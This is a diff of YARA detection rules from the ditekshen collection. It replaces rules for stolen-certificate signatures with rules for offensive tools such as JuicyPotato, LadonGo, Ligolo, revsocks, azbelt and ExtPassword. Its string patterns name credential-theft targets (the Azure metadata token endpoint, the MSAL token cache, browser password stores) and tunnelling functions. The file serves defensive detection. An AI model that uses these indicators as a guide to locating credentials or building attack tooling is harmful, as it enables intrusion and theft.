-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3425-L3436"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1180-L1191"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "863a1496ce37449fa7e94c407ce0e63a9d727fef9094135715d0cb14ed442e5e"
+		logic_hash = "22f6a717b8464bddd850bb5ea8b416e99bceb91fe917f188be178f2fff620730"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f6c9c564badc1bbd8a804c5e20ab1a0eff89d4c0"
-		importance = 20
+
+	strings:
+		$s1 = "txt_cscandll.Text" fullword wide
+		$s2 = "CscanWebExpBuild.frmMain.resources" fullword ascii
+		$s3 = "= \"$HttpXforwardedFor$\";" ascii
+		$s4 = "namespace netscan" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ffcdcbacfeaedbfbcecccafeb" and pe.signatures [ i ] . serial == "5d:5d:03:ed:b4:ec:4e:18:5c:aa:30:41:82:4a:b7:5c" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Aec009984Fa957F3F48Fe3104Ca9Babc : FILE
+rule DITEKSHEN_INDICATOR_TOOL_LTM_Ladongo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect LadonGo tool that assists in lateral movement across a network"
 		author = "ditekSHen"
-		id = "76b5d6b6-f443-55b5-b353-88201fe09e1f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4dbf7f24-b9ab-5629-8e78-667d9623dea9"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3438-L3449"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1193-L1207"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de9008e30468b94b4afbc622403b0257f5c5e3964344b980c18fc95219e06667"
+		logic_hash = "606172b8fb251cb4ad75de40b55d74779aef6409832f6edf09068083143ec749"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9d5b6bc86775395992a25d21d696d05d634a89d1"
-		importance = 20
+
+	strings:
+		$f1 = "main.VulDetection" fullword ascii
+		$f2 = "main.BruteFor" fullword ascii
+		$f3 = "main.RemoteExec" fullword ascii
+		$f4 = "main.Exploit" fullword ascii
+		$f5 = "main.Noping" fullword ascii
+		$f6 = "main.LadonScan" fullword ascii
+		$f7 = "main.LadonUrlScan" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ceefaccdedbfbbaaaadacdbf" and pe.signatures [ i ] . serial == "ae:c0:09:98:4f:a9:57:f3:f4:8f:e3:10:4c:a9:ba:bc" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xface ) and 5 of ( $f* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_283518F1940A11Caf187646D8063D61D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENC_Diskcryptor : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect DiskCryptor open encryption solution that offers encryption of all disk partitions"
 		author = "ditekSHen"
-		id = "cf5f7f11-3af6-577b-9a5e-eafe2de34e2b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "22b25d5c-d67f-53ac-9ae8-2de077afdda9"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3451-L3462"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1209-L1232"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7db16bc44059e2538eb896011598a599c6aead90fb873c530ce8f5391e440164"
+		logic_hash = "7ef0bf3b11f7e4055908518ce5b6a49e04d7002ebc3396fd2da32b4e13cf68e0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "aaeb19203b71e26c857613a5a2ba298c79910f5d"
-		importance = 20
+
+	strings:
+		$x1 = "\\DiskCryptor\\DCrypt\\" ascii
+		$s1 = "Error getting %sbootloader configuration" fullword wide
+		$s2 = "loader.iso" fullword wide
+		$s3 = "Bootloader config for [%s]" fullword wide
+		$s4 = "dc_get_mbr_config" fullword ascii
+		$s5 = "dc_encrypt_iso_image" fullword ascii
+		$s6 = "dc_start_re_encrypt" fullword ascii
+		$s7 = "dc_start_encrypt" fullword ascii
+		$s8 = "_w10_reflect_" ascii
+		$d1 = "\\DosDevices\\dcrypt" fullword wide
+		$d2 = "$dcsys$_fail_%x" fullword wide
+		$d3 = "%s\\$DC_TRIM_%x$" fullword wide
+		$d4 = "\\Device\\dcrypt" fullword wide
+		$d5 = "%s\\$dcsys$" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eeeeeeba" and pe.signatures [ i ] . serial == "28:35:18:f1:94:0a:11:ca:f1:87:64:6d:80:63:d6:1d" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 4 of ( $s* ) or 3 of ( $d* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_72F3E4707B94D0Eef214384De9B36E : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PRI_Installerfiletakeover : CVE_2021_41379 FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect InstallerFileTakeOver CVE-2021-41379"
 		author = "ditekSHen"
-		id = "bf02ea89-b3f3-58a1-8bcd-1a23b3c96b68"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "8581a306-e6d3-5ac1-a778-76c6505ee174"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3464-L3475"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1234-L1253"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c2a310ff70012076856239b5b5e6b46ffa121479dea38815e61f5336cecf8868"
+		logic_hash = "0a9e53138d33494d9b2aa0271b877e405ea2e8accba7c6eeac547caaa7a7c2ea"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		thumbprint = "e2a5a2823b0a56c88bfcb2788aa4406e084c4c9b"
-		importance = 20
+		quality = 50
+		tags = "CVE-2021-41379, FILE"
+
+	strings:
+		$s1 = "splwow64.exe" fullword ascii
+		$s2 = "notepad.exe" fullword ascii
+		$s3 = "%s\\System32\\cmd.exe" fullword wide
+		$s4 = "[SystemFolder]msiexec.exe" fullword wide
+		$s5 = "microsoft plz" ascii
+		$s6 = "%TEMP%\\" fullword wide
+		$x1 = "\\InstallerFileTakeOver.pdb" ascii
+		$o1 = { 48 b8 fe ff ff ff ff ff ff 7f 48 8b f5 48 83 ce }
+		$o2 = { 4c 8d 62 10 48 c7 c7 ff ff ff ff 48 8b c7 66 0f }
+		$o3 = { ff 15 9a 59 00 00 48 8b d8 e8 ba ff ff ff 45 33 }
+		$o4 = { 49 c7 43 a8 fe ff ff ff 49 89 5b 10 48 8b 05 5a }
+		$o5 = { 66 89 7c 24 50 48 c7 c2 ff ff ff ff 48 ff c2 66 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eaaebecedccfd" and pe.signatures [ i ] . serial == "72:f3:e4:70:7b:94:d0:ee:f2:14:38:4d:e9:b3:6e" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $o* ) ) ) or 4 of ( $s* ) or ( all of ( $o* ) and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D875B3E3F2Db6C3Eb426E24946066111 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PRI_Juicypotato : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect JuicyPotato"
 		author = "ditekSHen"
-		id = "a44cde8b-904b-5f1a-8cdb-4a8b16a42669"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2fb52598-9771-507b-a06d-7b9bc693ffee"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3477-L3488"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1255-L1270"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "470424bf28b723063be5d6801ee27b0f3748b761f9005616dcab4bd864db5463"
+		logic_hash = "43a7ac16b9633fd2e6c43ca142cd0d0e2166287bb51e1b6344119959fe054c19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d27211a59dc8a4b3073d116621b6857c3d70ed04"
-		importance = 20
+
+	strings:
+		$x1 = "\\JuicyPotato.pdb" ascii
+		$x2 = "JuicyPotato v%s" fullword ascii
+		$s1 = "hello.stg" fullword wide
+		$s2 = "ppVirtualProcessorRoots" fullword ascii
+		$s3 = "Lock already taken" fullword ascii
+		$s4 = "[+] authresult %d" fullword ascii
+		$s5 = "RPC -> send failed with error: %d" fullword ascii
+		$s6 = "Priv Adjust FALSE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kubit LLC" and pe.signatures [ i ] . serial == "00:d8:75:b3:e3:f2:db:6c:3e:b4:26:e2:49:46:06:61:11" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3990362C34015Ce4C23Ecc3377Fd3C06 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_ENUM_Sharpshares : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpShares multithreaded C# .NET Assembly to enumerate accessible network shares in a domain"
 		author = "ditekSHen"
-		id = "e76824c2-6ee7-5117-a83f-0b8e4f2d3b61"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "1da53e34-21a3-5b3c-885e-dcc8814ac3c8"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3490-L3501"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1290-L1305"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5e91a10f5027cae35524bef326edf7d5bf3df5bbc37c111b01e33f7667b03ce3"
+		logic_hash = "8b35d6a692814e1b27ffc1db4ab124bf621c156aaf57f24796c422ec95a85715"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "48444dec9d6839734d8383b110faabe05e697d45"
-		importance = 20
+
+	strings:
+		$s1 = "SharpShares." ascii wide
+		$s2 = "GetComputerShares" fullword ascii
+		$s3 = "userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*)(!(userAccountControl:1.2" wide
+		$s4 = "GetAllShares" fullword ascii
+		$s5 = "stealth:" wide
+		$s6 = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(operatingSystem=*server*))" fullword wide
+		$s7 = /\/targets|ldap|threads/ wide
+		$s8 = "entriesread" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RZOH ApS" and pe.signatures [ i ] . serial == "39:90:36:2c:34:01:5c:e4:c2:3e:cc:33:77:fd:3c:06" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_54A6D33F73129E0Ef059Ccf51Be0C35E : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PROX_Revsocks : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects revsocks Reverse socks5 tunneler with SSL/TLS and proxy support"
 		author = "ditekSHen"
-		id = "7b010276-718f-5168-bd8c-414252996fe6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "f85bc557-40ab-5533-8a89-a2de9bbc9ad9"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3503-L3514"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1307-L1321"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "93b332e4ad4e13c7e8241cf866091708232a6555a9240d828e558688167359a0"
+		logic_hash = "4a8e68f25b7ba10b0eb9772ed4ba2b9c6566768f2b5a2859df8bac644d196bf3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8ada307ab3a8983857d122c4cb48bf3b77b49c63"
-		importance = 20
+
+	strings:
+		$s1 = "main.agentpassword" fullword ascii
+		$s2 = "main.connectForSocks" fullword ascii
+		$s3 = "main.connectviaproxy" fullword ascii
+		$s4 = "main.DnsConnectSocks" fullword ascii
+		$s5 = "main.listenForAgents" fullword ascii
+		$s6 = "main.listenForClients" fullword ascii
+		$s7 = "main.getPEMs" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A55C15F733Bf1633E9Ffae8A6E3B37D : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Azbelt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects azbelt for enumerating Azure related credentials primarily on AAD joined machines"
 		author = "ditekSHen"
-		id = "86d8453b-115d-59f8-8123-5aff071ec3dd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cf9268d2-1928-51e8-9643-ee0a5bada9fa"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3516-L3527"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1323-L1338"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a772edb12dc0c351bb4d11f3e6ab3d9705af156ebeb4b8fff281bb418bfa1764"
+		logic_hash = "71cc2b3418ea5e285adafe03fa80bade67dc3e4073fe58d42bc6190860b48b43"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "591f68885fc805a10996262c93aab498c81f3010"
-		importance = 20
+
+	strings:
+		$s1 = "@http://169.254.169.254/metadata/identity/oauth2/token?api-version=" ascii
+		$s2 = "@Partner Customer Delegated Admin Offline Processor" fullword ascii
+		$s3 = "@TargetName: " fullword ascii
+		$s4 = "httpclient.nim" fullword ascii
+		$s5 = "@DSREG_DEVICE_JOIN" fullword ascii
+		$s6 = "@.azure/msal_token_cache.bin" fullword ascii
+		$s7 = "CredEnumerateW" fullword ascii
+		$s8 = "@http://169.254.169.254/metadata/instance?api-version=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Osnova OOO" and pe.signatures [ i ] . serial == "0a:55:c1:5f:73:3b:f1:63:3e:9f:fa:e8:a6:e3:b3:7d" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F675139Ea68B897A865A98F8E4611F00 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Dontsleep : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "7035ed66-73f9-568e-9698-13d9bbede64e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Keep Host Unlocked (Don't Sleep)"
+		author = "ditekShen"
+		id = "f71bd0d5-a526-5f1e-8bd3-9e653db610a7"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3529-L3540"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1340-L1354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9893e21fd2d5a475c9defb484921de17f4afc00619be413b9d5d55095e7f596a"
+		logic_hash = "b8e2132d3b36c3e2d2662a586916c7e4fc029f81af08b5c18006833c4e6f772f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "06d46ee9037080c003983d76be3216b7cad528f8"
-		importance = 20
+
+	strings:
+		$s1 = ":Repeat###DEL \"%s\"###if exist \"%s\" goto Repeat###DEL \"%s\"###" wide
+		$s2 = "powrprof.dll,SetSuspendState" wide
+		$s3 = "_selfdestruct.bat" wide
+		$s4 = "please_sleep_block_" ascii
+		$s5 = "Browser-Type: MiniBowserOK" wide
+		$s6 = "m_use_all_rule_no_sleep" ascii
+		$s7 = "BlockbyExecutionState: %d on:%d by_enable:%d" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BS TEHNIK d.o.o." and pe.signatures [ i ] . serial == "00:f6:75:13:9e:a6:8b:89:7a:86:5a:98:f8:e4:61:1f:00" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_121Fca3Cfa4Bd011669F5Cc4E053Aa3F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Nsudo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "be18fe1a-f810-5153-b565-97a0e33cf406"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects NSudo allowing to run processes as TrustedInstaller or System"
+		author = "ditekShen"
+		id = "9a21b923-b02e-553b-8f53-026d7034c319"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3542-L3553"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1356-L1369"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c5f7f23d9ba35bed3540233217e18b84c5ac0528fd3fe809c162fce6ccce0791"
+		logic_hash = "6bcffa79ca06b0b4178d6ea256f98d917c2b19cec0b059889b8d015d226a53f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "84b5ef4f981020df2385754ab1296821fa2f8977"
-		importance = 20
+
+	strings:
+		$x1 = "cmd /c start \"NSudo." wide
+		$x2 = "*\\shell\\NSudo" fullword wide
+		$x3 = "Projects\\NSudo\\Output\\Release\\x64\\NSudo.pdb" ascii
+		$s1 = "-ShowWindowMode=Hide" wide
+		$s2 = "?what@exception@@UEBAPEBDXZ" fullword ascii
+		$s3 = "NSudo.RunAs." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kymijoen Projektipalvelut Oy" and pe.signatures [ i ] . serial == "12:1f:ca:3c:fa:4b:d0:11:66:9f:5c:c4:e0:53:aa:3f" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 2 of ( $s* ) ) or all of ( $s* ) or 4 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_62B80Fc5E1C02072019C88Ee356152C1 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ligolo : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Ligolo tool for establishing SOCKS5 or TCP tunnels from a reverse connection"
 		author = "ditekSHen"
-		id = "08db7669-c3d6-5f27-988e-96e9fc0a60f3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cc461fd1-9a2f-59ce-af74-a0f55b8850b1"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3555-L3566"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1371-L1385"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c06e31f5a071ff7c87af216d22bffa2970372fa341ad2593ef0c3c6a71dac945"
+		logic_hash = "b515dc184013c2f67d37e42d7172e2471b3a93c94024be12c7f587296287282d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "0a83c0f116020fc1f43558a9a08b1f8bcbb809e0"
-		importance = 20
+
+	strings:
+		$p1 = "/ligolo/main.go" ascii
+		$p2 = "/armon/go-socks5" ascii
+		$s1 = "main.StartLigolo" fullword ascii
+		$s2 = "main.handleRelay" fullword ascii
+		$s3 = "main.startSocksProxy" fullword ascii
+		$s4 = "_main.tlsFingerprint" fullword ascii
+		$s5 = "main.verifyTlsCertificate" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Inversum" and pe.signatures [ i ] . serial == "62:b8:0f:c5:e1:c0:20:72:01:9c:88:ee:35:61:52:c1" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( ( all of ( $p* ) and 1 of ( $s* ) ) or all of ( $s* ) or ( 1 of ( $p* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_F0E150C304De35F2E9086185581F4053 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Extpassword : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ExtPassword External Drive Password Recovery"
 		author = "ditekSHen"
-		id = "d2a5cd5b-1e4a-5714-bff2-08f2c958cd0b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "bb06d2c1-964d-5a3d-a741-09b8ef5ac7fa"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3581-L3592"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1387-L1403"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fe3d5d57d0a98414e3e4f35248d3ebf64617c16a4119a21883c3679b06146745"
+		logic_hash = "525530cb7e9f44be0408fd710306f90056b1b6b9a9e4779d8c1eb1ddef443fb0"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "c0a448b9101f48309a8e5a67c11db09da14b54bb"
-		importance = 20
+
+	strings:
+		$x1 = "ExtPassword!" fullword wide
+		$s2 = "GReading Chrome password file: %s" fullword wide
+		$s3 = "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy%d" fullword wide
+		$s4 = "2015-07-27 13:49:41 b8e92227a469de677a66da62e4361f099c0b79d0" ascii
+		$s5 = "metadata WHERE id = 'password'" ascii
+		$s6 = /Scanning\s(Credentials\sfolder|Credentials\sfolder|Firefox\sand\sother\sMozilla\sWeb\sbrowsers|Chromium-based\Web\browsers|Outlook\saccounts|Windows\sVault|dialup\/VPN\sitems|wireless\skeys|Windows\ssecurity\squestions|vault\spasswords)/ wide
+		$s7 = "lhelp32Snapsho" fullword ascii
+		$s8 = "SELECT origin_" fullword ascii
+		$s9 = "password#Ck" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rare Ideas, LLC" and pe.signatures [ i ] . serial == "f0:e1:50:c3:04:de:35:f2:e9:08:61:85:58:1f:40:53" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_A1A3E7280E0A2Df12F84309649820519 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Ngrok : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Ngrok"
 		author = "ditekSHen"
-		id = "71ad82d6-e45e-52a9-b1ff-f00cfe7b5186"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "fc0a0de8-b68b-5b6b-a222-bbc031ebabd3"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3594-L3605"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1405-L1418"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5c656fa5a6671f717cda5433c8780d308f11b7937e5ff66b4f3f74623b217365"
+		logic_hash = "f4bba142652aaf77e5b7c123b743cf165ae17210c39cf65b7311f7e7bd91f7e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "33d254c711937b469d1b08ef15b0a9f5b4d27250"
-		importance = 20
+
+	strings:
+		$s1 = "dashboard.ngrok.com" ascii
+		$s2 = "go.ngrok.com/cmd/ngrok/main.go" ascii
+		$s3 = "ngrok agent" ascii
+		$s4 = "*ngrok.clientInfo" ascii
+		$s5 = "'%s'  socket: '%s'  port: %d/edges/https/{{ .EdgeID }}/routes/{{ .ID }}/webhook_" ascii
+		$s6 = "/{{ .ID }}/tunnel_sessions/{{ .ID }}/restart" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nir Sofer" and pe.signatures [ i ] . serial == "a1:a3:e7:28:0e:0a:2d:f1:2f:84:30:96:49:82:05:19" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and ( 3 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Fb984D5A7296Ba74445C23Ead7D20Aa : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sqlrecon : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SQLRecon C# MS-SQL toolkit designed for offensive reconnaissance and post-exploitation"
